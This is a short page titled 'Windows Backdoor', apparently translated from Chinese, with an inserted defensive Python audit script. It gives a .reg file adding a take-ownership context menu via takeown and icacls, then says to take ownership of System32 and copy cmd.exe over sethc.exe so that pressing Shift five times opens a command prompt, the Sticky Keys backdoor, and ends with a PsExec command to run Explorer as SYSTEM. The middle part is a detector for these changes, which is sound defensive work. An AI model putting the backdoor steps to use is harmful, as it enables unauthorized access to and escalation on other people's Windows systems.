Windows Backdoor


1. Open Notepad and enter the following text:

Windows Registry Editor Version 5.00

; Context-menu entry for all files. The label "获取权限" means "Take ownership".
[HKEY_CLASSES_ROOT\*\shell\runas]
@="获取权限"
"NoWorkingDirectory"=""

; Take ownership of the selected file and grant Administrators full control.
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

; The same entry for directories.
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="获取权限"
"NoWorkingDirectory"=""

; Recursive variant: /r /d y for takeown, /t for icacls.
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

2. Save the file as 导入.reg ("import.reg").

3. Double-click 导入.reg to import it into the registry.

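After taking ownership of the system32 folder, run copy cmd.exe sethc.exe in cmd. Pressing Shift five times (the Sticky Keys shortcut, which launches sethc.exe) then opens cmd.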
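An added defensive example (not part of the original page): Python code that audits the text of a .reg file or registry export for context-menu commands that call takeown or icacls, as the file above does, and checks whether sethc.exe in a System32 directory (live, or from a mounted disk image) is byte-identical to cmd.exe. The function names and the sample input are constructed for illustration.

```python
import hashlib
import re
from pathlib import Path

# Ownership/ACL tools that the page's context-menu command invokes.
SUSPICIOUS = re.compile(r"\b(takeown|icacls)\b", re.IGNORECASE)
# Only values under ...\shell\<verb>\command are context-menu commands.
SHELL_CMD_KEY = re.compile(r"\\shell\\[^\\]+\\command$", re.IGNORECASE)
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")\s*=\s*"(.*)"$')


def audit_reg(text):
    """Return (key, value_name, command) for shell verbs that change ownership or ACLs."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]  # start of a new key section
            continue
        m = VALUE_LINE.match(line)
        if not m or key is None or not SHELL_CMD_KEY.search(key):
            continue
        name = "(Default)" if m.group(1) == "@" else m.group(1)[1:-1]
        data = re.sub(r"\\(.)", r"\1", m.group(2))  # undo .reg string escaping
        if SUSPICIOUS.search(data):
            findings.append((key, name, data))
    return findings


def sethc_replaced(system32):
    """True when sethc.exe has the same SHA-256 as cmd.exe in the given directory."""
    d = Path(system32)
    h = [hashlib.sha256((d / n).read_bytes()).hexdigest() for n in ("sethc.exe", "cmd.exe")]
    return h[0] == h[1]


# Constructed sample: one key in the style of the page's file, one benign verb.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\txtfile\shell\open\command]
@="notepad.exe \"%1\""
'''

if __name__ == "__main__":
    for key, name, data in audit_reg(SAMPLE):
        print(f"{key} [{name}] -> {data}")
```

Files exported by regedit in the Version 5.00 format are UTF-16, so read them with encoding="utf-16" before passing the text to audit_reg.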


Escalating to SYSTEM:

PsExec -s -i explorer.exe
